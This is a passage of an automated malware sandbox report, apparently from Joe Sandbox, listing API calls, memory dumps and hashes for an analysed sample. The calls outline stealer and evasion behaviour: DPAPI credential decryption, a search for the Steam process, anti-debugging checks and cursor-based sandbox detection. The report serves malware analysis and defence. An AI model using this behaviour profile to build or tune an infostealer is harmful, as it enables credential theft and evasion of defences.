                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                        • String ID: steam.exe
                                                                                                                                                                        • API String ID: 1799959500-2826358650
APIs
• OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00181823
• SetThreadDesktop.USER32(00000000), ref: 0018182A
• GetCursorPos.USER32(?), ref: 0018183A
• Sleep.KERNEL32(000003E8), ref: 0018184A
• GetCursorPos.USER32(?), ref: 00181859
• Sleep.KERNEL32(00002710), ref: 0018186B
• Sleep.KERNEL32(000003E8), ref: 00181870
• GetCursorPos.USER32(?), ref: 0018187F
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Yara matches
Similarity
• API ID: CursorSleep$Desktop$InputOpenThread
• String ID:
• API String ID: 3283940658-0
APIs
• _memset.LIBCMT ref: 0018A7EA
• lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A805
• CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0018A80D
• _memmove.LIBCMT ref: 0018A890
• lstrcatA.KERNEL32(001B6801,001B6803,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8BA
• lstrcatA.KERNEL32(001B6801,001B680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8D0
Yara matches
Similarity
• API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
• String ID:
• API String ID: 943939369-0
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,001AB785,?,001A8536,?,000000BC,?), ref: 001AB15B
• GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,001AB785,?,001A8536,?,000000BC,?), ref: 001AB184
• GetACP.KERNEL32(?,?,001AB785,?,001A8536,?,000000BC,?), ref: 001AB198
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                        • Opcode ID: 56b80d1c9f2e7983199ac2901a72b8fc1a0f547f98c359517dd730c0cd7995f4
                                                                                                                                                                        • Instruction ID: 7a9f409f4a02ad3cb75731caa0d9fbd7057e5accbfbd9b3bfdcec955dd044218
                                                                                                                                                                        • Opcode Fuzzy Hash: 56b80d1c9f2e7983199ac2901a72b8fc1a0f547f98c359517dd730c0cd7995f4
                                                                                                                                                                        • Instruction Fuzzy Hash: 33012035A09686BAEB269B64FCA6F5F73F89F06358F104014F001E50D2E770CEC1D654
APIs
• IsDebuggerPresent.KERNEL32 ref: 0019D492
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0019D4A7
• UnhandledExceptionFilter.KERNEL32(001B332C), ref: 0019D4B2
• GetCurrentProcess.KERNEL32(C0000409), ref: 0019D4CE
• TerminateProcess.KERNEL32(00000000), ref: 0019D4D5
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 3542c155f0dd6a4390cb80090e4c90600bae8c8cf72379b1d466810198c66cb2
• Instruction ID: 8059b049833714536b75ee0b4f3dbe49693d50e5015898e933310ab2b37f886e
• Opcode Fuzzy Hash: 3542c155f0dd6a4390cb80090e4c90600bae8c8cf72379b1d466810198c66cb2
• Instruction Fuzzy Hash: 6D21CEB4803206DFDB15EF28FC44A983BA5FB58300F108A1BF51897A60E7B099C6CF95
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0018823B), ref: 001880C4
• LocalAlloc.KERNEL32(00000040,0018823B,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880D8
• LocalFree.KERNEL32(0018CB6A,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID: DPAPI
• API String ID: 2068576380-1690256801
• Opcode ID: 5c3543e80952f2db94a20e6f943727b62577da7b3ae3ec231d5dcfff2ecccc59
• Instruction ID: 28a35c7c18cb5c11d78e68a067fbe04412f25feacf6d6d6a7d749588346c76a8
• Opcode Fuzzy Hash: 5c3543e80952f2db94a20e6f943727b62577da7b3ae3ec231d5dcfff2ecccc59
• Instruction Fuzzy Hash: FB01DA76A01218AFCB01EFA8D98489EBBBDFB48714B108466E906E7340D7719E05CB90
APIs
• SetFilePointer.KERNEL32(?,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0019C5D4,?,00196F69,?), ref: 0019C05E
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0019C5D4,?,00196F69), ref: 0019C08E
• GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0019C5D4,?,00196F69,?), ref: 0019C0BA
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0019C5D4,?,00196F69,?), ref: 0019C0C8
  • Part of subcall function 0019B9D6: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0019BA0A
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3986731826-0
                                                                                                                                                                        • Opcode ID: 890a707f137803c3cd0b93e50280db566a50a74881ec393875b0354d1d637134
                                                                                                                                                                        • Instruction ID: d6b76a18a31a719db2d4aa6699bac852e5a1cefe96a396482db322f3aa09c0c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 890a707f137803c3cd0b93e50280db566a50a74881ec393875b0354d1d637134
                                                                                                                                                                        • Instruction Fuzzy Hash: 82415C71900209DFCF15DF69D884A9EBBF8FF88310F14026AE855EB266E3349945CFA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,003DE708,?,?,?,001928E1,?,?,00000000), ref: 00191E52
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,001928E1,?,?,00000000), ref: 00191E5F
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,001928E1,?,?,00000000), ref: 00191E66
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1871034439-0
                                                                                                                                                                        • Opcode ID: 4f83b951d043773a207f332b5db811271e6b0feafd76cd143c1d733738d75ea4
                                                                                                                                                                        • Instruction ID: 84d55f4e55776a8812b0b896f2b29e02b32ac166798ad6ca65acd002abb35ca5
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f83b951d043773a207f332b5db811271e6b0feafd76cd143c1d733738d75ea4
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A011E71501209FFEF129F61EC488AB7FBEFF497A4B108559F80597110D7319990EB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188060
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00186724,?), ref: 0018806E
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188084
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00186724,?), ref: 00188093
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4291131564-0
                                                                                                                                                                        • Opcode ID: 4b05967053b90ca7063e771e22bdb0233ed80f9fbb0524c2d37fb18bb7a2e843
                                                                                                                                                                        • Instruction ID: cb7d715cb997a14ed031050a0e925c873b5d5a421ca132f6509f63ca1165de2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b05967053b90ca7063e771e22bdb0233ed80f9fbb0524c2d37fb18bb7a2e843
                                                                                                                                                                        • Instruction Fuzzy Hash: 98F0C474102234BBDB326F66DC49E9B7FACEF0ABA0F100455F909DA250D7718A40DBA1
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0018146D
                                                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000), ref: 00181474
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
• API ID: Process$CurrentInformationQuery
• API String ID: 3953534283-0
APIs
• EnumSystemLocalesA.KERNEL32(Function_0002B211,00000001), ref: 001AB5BF
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• API ID: EnumLocalesSystem
• API String ID: 2099609381-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0002763C), ref: 001A7683
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
• Instruction ID: 4ae5d8cca1c642a3532f62b596a36a9495c58fc0522ad3299538e26d3e57fede
• Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
• Instruction Fuzzy Hash: 75C17BB7D0A9B2098B36466D141823FEFA26ED3B5031FC3A5DCD13F989C722AD1596D0
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
• Instruction ID: d8402bad39bd196eec70b2c7691ff0256fdef17f12f1b81b7fead0d3fed9cdca
• Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
• Instruction Fuzzy Hash: 21C16BB7D0EDB2098B36466D245823AEFA26ED3B5131F8395DCD13F989C322AD05D6D0
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
• Instruction ID: 2d47b22292524cf02c980e3e9f5c3372bf9bc13b8bd8b96630ab219b44763c1d
• Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
• Instruction Fuzzy Hash: 65C18C77D0ADB2098B36466D241833BFFA26EC3B5431B83A5CCD53F989C726AD0596D0
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
• Instruction ID: 99f23ce30e55db4802f024916789430a9495c1cd16803cf42e736a48d953c5ad
• Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
• Instruction Fuzzy Hash: ECB17FB7D0ADB2098B36456D245823FEFA26ED2B4031FC395DCE13F989C722AD0596D0
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
